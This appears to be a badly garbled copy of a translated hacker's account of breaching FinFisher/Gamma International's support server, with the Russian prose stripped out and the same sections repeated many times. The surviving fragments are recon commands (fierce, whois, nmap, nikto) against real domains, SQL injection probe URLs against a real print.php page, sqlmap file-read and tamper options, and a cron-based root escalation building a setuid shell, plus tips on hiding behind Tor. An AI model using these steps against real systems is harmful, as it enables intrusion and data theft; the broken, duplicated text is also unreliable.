, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-
www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-
academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,
fierce.pl
,
fierce.pl -dns
- IP-. , , .
Google . ,
academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,
academiproshop.com
, .
FinFisher
finsupport.finfisher.com
whois-
finfisher.com
, " FinFisher GmbH ".
"FinFisher GmbH" inurl:domaintools
gamma-international.de
,
finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .
fierce
git-,
git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.
fierce
, ,
test.company.com
dev.company.com
, . nikto .
webserver/.svn/
,
webserver/backup/
,
webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (
index.php
, , ).
Scripts/scripts.js.php
Google:
allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:
allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap
--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport .
/BackOffice/
403 Forbidden , SQL- ( ).
print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,
print.php
, . ! MySQL . ,
magicquotes
, MySQL-
INTO OUTFILE
. ,
sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,
unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,
cron
.
webalizer
, , . ,
cron
, ,
cron
.
ls -l /etc/localtime
, 6- ,
webalizer
, , , . , , , - , , . Root- , .
, . , , .
nmap
. nse-
nfs-*
smb-*
. finsupport - -,
qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
